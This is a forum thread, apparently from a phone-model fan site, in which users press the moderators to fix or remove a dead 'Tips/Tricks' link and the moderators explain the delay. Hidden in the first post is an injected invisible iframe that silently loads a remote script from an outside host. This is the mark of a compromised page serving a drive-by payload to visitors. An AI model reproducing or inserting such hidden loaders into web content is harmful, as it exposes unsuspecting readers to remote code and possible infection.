+ Reply to Thread
    tfischer

Tips/tricks section

From the main page (www.qcp6035.com) this link doesn't work. If the section is under repair or design, perhaps a page could be put up to that effect, or the link removed?

Great site, by the way,
    -Tim<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

tfischer
    I'm surprised nobody's responded to this yet. It seems like it would be pretty easy to at least remove the link.

The rest of the site maintenance has been fantastic, so why this obvious oversite on the main page? I'm guessing most new users would click on 'tips/tricks' before discussion, and now they get a broken link.

I agree - why have a dead link without any indication that it will ever be set up!

Thanks for the heads up guys....we knew that it was a "dead link" and it's on our To Do list :d

The original idea was to take the most prominent ideas from the user created FAQ and list them on the "Tips/Tricks" Page, which we may still do in the future.
    --Jazz--

tfischer
    That's cool-- but a "coming soon" page, or better yet, changing the link to static text that says "tips &amp; tricks coming soon" would be much better than a broken link.

Broken links make it look like the website isn't maintained.

Thanks,
    -Tim

Dead Links shows change

I like the turbulence. A dead link here or there never hurt anyone. You guys take your time and fix it whenever you feel like it--or don't fix it at all. I say link it to an I300 website

tfischer
    Whaddever-- as long as a page with two links, one being dead seems appropriate to you...

-Tim

P.S. Please realize that I'm not criticizing the site. This is a GREAT site and that's why I'm confused as to why the obvious problem?

I'm sure that the moderators appreciated your observation. As you know, they work really hard on this site and want it to look its best.

Allen

P.S. Constructive criticism is a good thing.

michaelSC
    As far as I am concerned, the hosts can take their time to come up with a tips section; but they should remove the dead link now.

Agree on the "great site" comment.

[quote:989bed2a3c][i:989bed2a3c]Originally posted by tfischer [/i:989bed2a3c]
    [B]This is a GREAT site and that's why I'm confused as to why the obvious problem? [/quote:989bed2a3c]

EAlbert
    I see this error dating back to August of 2001????

Then I see posts in FEB, MAR &amp; now APR.

Your TO-DO list must look like MY honey-do list.

Change the administrators names from Jazzy to procrastinatey. Hey if we can't tease the ones that administrate for us, who can we tease?

Semper Fidelis, ELA

[quote:8ac6502d46][i:8ac6502d46]Originally posted by michaelSC [/i:8ac6502d46]
    [B]As far as I am concerned, the hosts can take their time to come up with a tips section; but they should remove the dead link now.

Agree on the "great site" comment.

[/quote:8ac6502d46]

EAlbert-

[b:7ef05c97eb]What are you talking about?[/b:7ef05c97eb]

It seems to me that this thread originated in February of this year! Are you sure you're not looking at the dates that the individual members joined the forum instead of when the messge was actually posted?
    -- EMu

I'm sure Jimmyjoe would love to remove the dead link for the Tips/Tricks section if he had 5 minutes to sit down and look at the board again!

Please be patient and he will get to it...... if you only knew how busy he was! Anyone got a cloning machine?:d

The administrators are admins of the board only, not the main website so unfortunately we are not able to remove that dead link either....

Sorry
    --Jazz--